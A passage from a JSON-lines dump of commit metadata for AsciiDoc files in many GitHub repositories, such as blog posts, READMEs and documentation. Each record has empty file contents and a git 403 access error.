<52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Maxim Uvarov <db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"dkrot\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,mike-holmes-linaro\/odp,nmorey\/odp,dkrot\/odp,erachmi\/odp,mike-holmes-linaro\/odp,dkrot\/odp,ravineet-singh\/odp,erachmi\/odp,erachmi\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"41dfaa92b5626fdcde4031ec41c3a62b7fa7d56a","subject":"Update 2016-04-01-Swim-Times-31032016.adoc","message":"Update 2016-04-01-Swim-Times-31032016.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-04-01-Swim-Times-31032016.adoc","new_file":"_posts\/2016-04-01-Swim-Times-31032016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdab6bb9523408d8e7ab5bedc1cab0db36c778b3","subject":"Update 2016-5-13-Engineer-Career-Path.adoc","message":"Update 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a3a7a06a535d2c00b8f28b07d747235a4e729e7","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ffb71b9e2d750a79e13090817930aad4afe4776","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6aa37761cf60ced255447b3a781f653f7677ed6b","subject":"added simple readme explaining tools dir contents","message":"added simple readme explaining tools dir contents\n","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"enterprise\/tools\/README.asciidoc","new_file":"enterprise\/tools\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HuangLS\/neo4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"019af980e388fa22f8fd0e0cb3be55b395d200b1","subject":"TRex -w argument doc","message":"TRex -w argument doc\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6c6eb09a4226e9aefa05348c2c32d64ab59aade","subject":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","message":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"806f177dea0bbe04ec1b59feac093e6643b8ae57","subject":"Update 2017-05-29-Demo-Mah-Rocks.adoc","message":"Update 2017-05-29-Demo-Mah-Rocks.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-05-29-Demo-Mah-Rocks.adoc","new_file":"_posts\/2017-05-29-Demo-Mah-Rocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da552ee4be69227493ad94ba1d4ad2a40b11fe08","subject":"Update 2018-06-04-php-Documentor.adoc","message":"Update 2018-06-04-php-Documentor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-04-php-Documentor.adoc","new_file":"_posts\/2018-06-04-php-Documentor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"018c420844efb79681b731d1f1566364c9bf2e94","subject":"add new tap news","message":"add new tap news\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2020\/02\/28\/clojure-tap.adoc","new_file":"content\/news\/2020\/02\/28\/clojure-tap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e6cb9a3937f76441eb5630dcd789162113f56931","subject":"Intro","message":"Intro\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"DB from Eclipse.adoc","new_file":"DB from Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56d93db7afdce2f8d3dc0a9972ca0f01592360e2","subject":"Update 2017-04-27-Title-H1.adoc","message":"Update 2017-04-27-Title-H1.adoc","repos":"mkaptein172\/mkaptein172.github.io,mkaptein172\/mkaptein172.github.io,mkaptein172\/mkaptein172.github.io,mkaptein172\/mkaptein172.github.io","old_file":"_posts\/2017-04-27-Title-H1.adoc","new_file":"_posts\/2017-04-27-Title-H1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkaptein172\/mkaptein172.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"775e55728387520ff33ff27006609dac25ede3ac","subject":"Update 2018-04-21-Azure-11.adoc","message":"Update 2018-04-21-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-21-Azure-11.adoc","new_file":"_posts\/2018-04-21-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd17254e6e632ef8d141da9f372442b1abc00a4c","subject":"added server control panel and webinterface to the initial five sentence statement :)","message":"added server control panel and webinterface to the initial five sentence statement :)\n","repos":"Akhiljs\/WPN-XM,iCasa\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,iCasa\/WPN-XM,Akhiljs\/WPN-XM,iamelectron\/WPN-XM,iamelectron\/WPN-XM,iCasa\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,iamelectron\/WPN-XM,gencer\/WPN-XM,Akhiljs\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,Akhiljs\/WPN-XM,gencer\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,Akhiljs\/WPN-XM,Akhiljs\/WPN-XM,iamelectron\/WPN-XM,gencer\/WPN-XM,gencer\/WPN-XM,iamelectron\/WPN-XM,iamelectron\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iCasa\/WPN-XM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cb0bea5ca85c55dd41ae959db544e4c97464bbe","subject":"Update 2018-03-20-Asciidoctor-Gradle.adoc","message":"Update 2018-03-20-Asciidoctor-Gradle.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2018-03-20-Asciidoctor-Gradle.adoc","new_file":"_posts\/2018-03-20-Asciidoctor-Gradle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"546a9c1a7f3e2fcf7fd1528c5ebb381d55e48aac","subject":"Update 2018-05-07-try-gas-with-slack.adoc","message":"Update 2018-05-07-try-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"423f318a5a71fa4b8daf89f44f929835d22f2510","subject":"Update 2016-07-10-Bararbunga.adoc","message":"Update 2016-07-10-Bararbunga.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-10-Bararbunga.adoc","new_file":"_posts\/2016-07-10-Bararbunga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f06bcfa10278daf6eef296e6dd2ce45ef48d8db9","subject":"Update 2017-08-17-Speedy-ide.adoc","message":"Update 2017-08-17-Speedy-ide.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-17-Speedy-ide.adoc","new_file":"_posts\/2017-08-17-Speedy-ide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"934c36cecc74460b9956b8e9efef5f7a0975bc61","subject":"Update 2015-10-11-MapReduce-Tutorial.adoc","message":"Update 2015-10-11-MapReduce-Tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef112e3c7a50eeed23608bb82b8a2679c0f4679a","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b5892d96d431ababc6d9642a7b59a3c7183fbd8","subject":"Add cookbook draft","message":"Add cookbook draft\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/cookbook\/index.asciidoc","new_file":"doc\/src\/main\/docs\/cookbook\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6df9404fd224326ae7d86da22114a0ce3f7c0428","subject":"Update 2017-06-01-OSM-Knowledge.adoc","message":"Update 2017-06-01-OSM-Knowledge.adoc","repos":"porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io","old_file":"_posts\/2017-06-01-OSM-Knowledge.adoc","new_file":"_posts\/2017-06-01-OSM-Knowledge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/porolakka\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abbe365c82e062513a95e227f021e64f096b02ae","subject":"Update 2015-09-17-Amours.adoc","message":"Update 2015-09-17-Amours.adoc","repos":"NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io,NadineLaCuisine\/NadineLaCuisine.github.io","old_file":"_posts\/2015-09-17-Amours.adoc","new_file":"_posts\/2015-09-17-Amours.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NadineLaCuisine\/NadineLaCuisine.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"840bd1841eaa2a3ca52277f6f51899a311aa82e7","subject":"Payment-methods","message":"Payment-methods","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/payment\/includes\/payment_methods.adoc","new_file":"userguide\/payment\/includes\/payment_methods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1acabe6095a3def5519de2e200752d545bcaa70c","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"Intera\/urlaubsverwaltung,Intera\/urlaubsverwaltung,Intera\/urlaubsverwaltung","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Intera\/urlaubsverwaltung.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01b8b20d432ddd933086dc5bb3b3829db4cc201c","subject":"Add contributing document","message":"Add contributing document\n","repos":"spring-projects\/spring-social-linkedin,spring-projects\/spring-social-linkedin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-social-linkedin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80594f9c1850cff6381d443caa66a01aebf66e00","subject":"Update 2016-01-11-.adoc","message":"Update 2016-01-11-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-11-.adoc","new_file":"_posts\/2016-01-11-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4f47ee3c81ed73fc25abc3f6a91afaaaf2ed7e5","subject":"Update 2015-01-11-Delete-Me-Mr-Whippy.adoc","message":"Update 2015-01-11-Delete-Me-Mr-Whippy.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-01-11-Delete-Me-Mr-Whippy.adoc","new_file":"_posts\/2015-01-11-Delete-Me-Mr-Whippy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b746b8db363fdbe4ee8d278c7559248ab90de75f","subject":"Update 2016-01-28-Puzzle-4-No-Hacking.adoc","message":"Update 2016-01-28-Puzzle-4-No-Hacking.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-28-Puzzle-4-No-Hacking.adoc","new_file":"_posts\/2016-01-28-Puzzle-4-No-Hacking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6817ec96e2da62d63e24a3bdb36c530fe27832d","subject":"Deleted _posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","message":"Deleted _posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ffcb370084c8aaabe6d4dd3444ab4e4a943b628","subject":"Update 2015-02-12-40-nutzliche-Joomla-Links.adoc","message":"Update 2015-02-12-40-nutzliche-Joomla-Links.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-12-40-nutzliche-Joomla-Links.adoc","new_file":"_posts\/2015-02-12-40-nutzliche-Joomla-Links.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c6e5e99aca5172bf6c9638ceda2cd14b2f56d07","subject":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","message":"Update 2015-09-21-Learn-Python-The-Hard-Way.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_file":"_posts\/2015-09-21-Learn-Python-The-Hard-Way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65cfafac027b6fefa9a3d0fa6df33d0d892ce131","subject":"Update 2096-1-1-Puzzle-5-Admission-e-ticket.adoc","message":"Update 2096-1-1-Puzzle-5-Admission-e-ticket.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2096-1-1-Puzzle-5-Admission-e-ticket.adoc","new_file":"_posts\/2096-1-1-Puzzle-5-Admission-e-ticket.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ed602134cb6cf2901da03aa25734694783efa0f","subject":"Add 2017 conj","message":"Add 2017 conj\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojureconj.adoc","new_file":"content\/events\/2017\/clojureconj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"33a36a4bceff56326c32c548a2bdf63958e0f268","subject":"y2b create post New 15\\","message":"y2b create post New 15\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-06-11-New-15.adoc","new_file":"_posts\/2012-06-11-New-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6177ba697758a05e6b4742fb8f977cf2f4cd5eb","subject":"Guidance on pre-release process (#755)","message":"Guidance on pre-release process (#755)\n\n* Guidance on pre-release process\r\n\r\nSo that the required actions on Pivotal's side during release are as\r\nminimal as possible, here is a list of things to do before asking\r\nPivotal to run release scripts.\r\n\r\n* elaborate version name change\r\n\r\n* PR comments\r\n\r\n* mention mvn versions:set\r\n\r\n* style fix\r\n\r\n* pr comments\r\n","repos":"GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp","old_file":"RELEASING.adoc","new_file":"RELEASING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"095424dd33ca9c5c17b43a6c640d2e59c985da88","subject":"Use img.shields.io badges","message":"Use img.shields.io badges\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f41c7835da4b7465217ba060af504d40d641d7cf","subject":"Added Jenkins link in the readme","message":"Added Jenkins link in the readme\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf9294f2250c6f736e29ce417133a3dc5b21967d","subject":"readme","message":"readme\n","repos":"codethatspeaks\/java-generics","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codethatspeaks\/java-generics.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"c2738a2dc2431894e545aa124a75349802dd2db2","subject":"Fixed copyright","message":"Fixed copyright\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e0cce1975c22c42c94860b2de2776343e49753f","subject":"Update 2015-07-03-Trying-out-Hubpress.adoc","message":"Update 2015-07-03-Trying-out-Hubpress.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-03-Trying-out-Hubpress.adoc","new_file":"_posts\/2015-07-03-Trying-out-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc86918b2594ada7e098ca51a0eadaccbdfec2c7","subject":"Update 2015-11-25-11-10-Bitmask-usage.adoc","message":"Update 2015-11-25-11-10-Bitmask-usage.adoc","repos":"never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io","old_file":"_posts\/2015-11-25-11-10-Bitmask-usage.adoc","new_file":"_posts\/2015-11-25-11-10-Bitmask-usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/never-ask-never-know\/never-ask-never-know.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdd3cceab2cd9d139163297bedba9cab9cda4237","subject":"Publicatie datum toegevoegd","message":"Publicatie datum toegevoegd","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e2fcf23663e8667ed97b4a275bbcbafaca9c40c","subject":"[docs] Fix table name in Impala docs","message":"[docs] Fix table name in Impala docs\n\nChange-Id: I39866cfc810731e26592ddffd9a328bc8380f46e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12534\nTested-by: Kudu Jenkins\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31658a5111769fabbd6d916632700dbec9997273","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 